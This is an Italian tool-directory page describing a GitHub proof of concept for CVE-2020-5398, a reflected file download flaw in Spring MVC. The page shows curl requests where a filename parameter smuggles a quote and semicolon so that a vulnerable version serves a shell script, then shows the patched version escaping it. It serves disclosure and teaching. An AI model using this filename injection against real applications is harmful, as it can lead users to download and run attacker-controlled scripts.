Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-5398 — CVE-2020-5398 - Attacco RFD (Reflected File Download) per Spring MVC | Kitploit
Strumenti/GitHubGitHub/motikan2010/cve-2020-5398
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubmotikan2010/cve-2020-5398

CVE-2020-5398

CVE-2020-5398 - Attacco RFD (Reflected File Download) per Spring MVC

Vedi Repository
84183 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-5398 - Attacco RFD (Reflected File Download) per Spring MVC

In Spring Framework, le versioni 5.2.x precedenti alla 5.2.3, le versioni 5.1.x precedenti alla 5.1.13 e le versioni 5.0.x precedenti alla 5.0.16 rendono un'applicazione vulnerabile a un attacco di tipo reflected file download (RFD) quando viene impostata un'intestazione “Content-Disposition” nella risposta in cui l'attributo filename deriva da un input fornito dall'utente.

Utilizzo

root@kitploit:~
./gradlew bootrun

In ascolto su 127.0.0.1:8080.

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World

Avvia il download del file sample.txt.

PoC

Versione non sicura (Spring Web 5.2.2)

root@kitploit:~
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id

Avvia il download del file sample.sh. (File shell)

Versione sicura (Spring Web 5.2.3)

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id

Avvia il download del file sample.sh";.txt. (File di testo)

Riferimenti

  • CVE-2020-5398: attacco RFD tramite l'intestazione “Content-Disposition” originata dall'input della richiesta in applicazioni Spring MVC o Spring WebFlux | Sicurezza | Pivotal
  • NVD - CVE-2020-5398
  • Cos'è l'attacco RFD?
    • eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
    • Reflected File Download - OWASP
  • Commit di correzione
    • ContentDisposition refactoring · spring-projects/spring-framework@956ffe6
Scarica lo strumento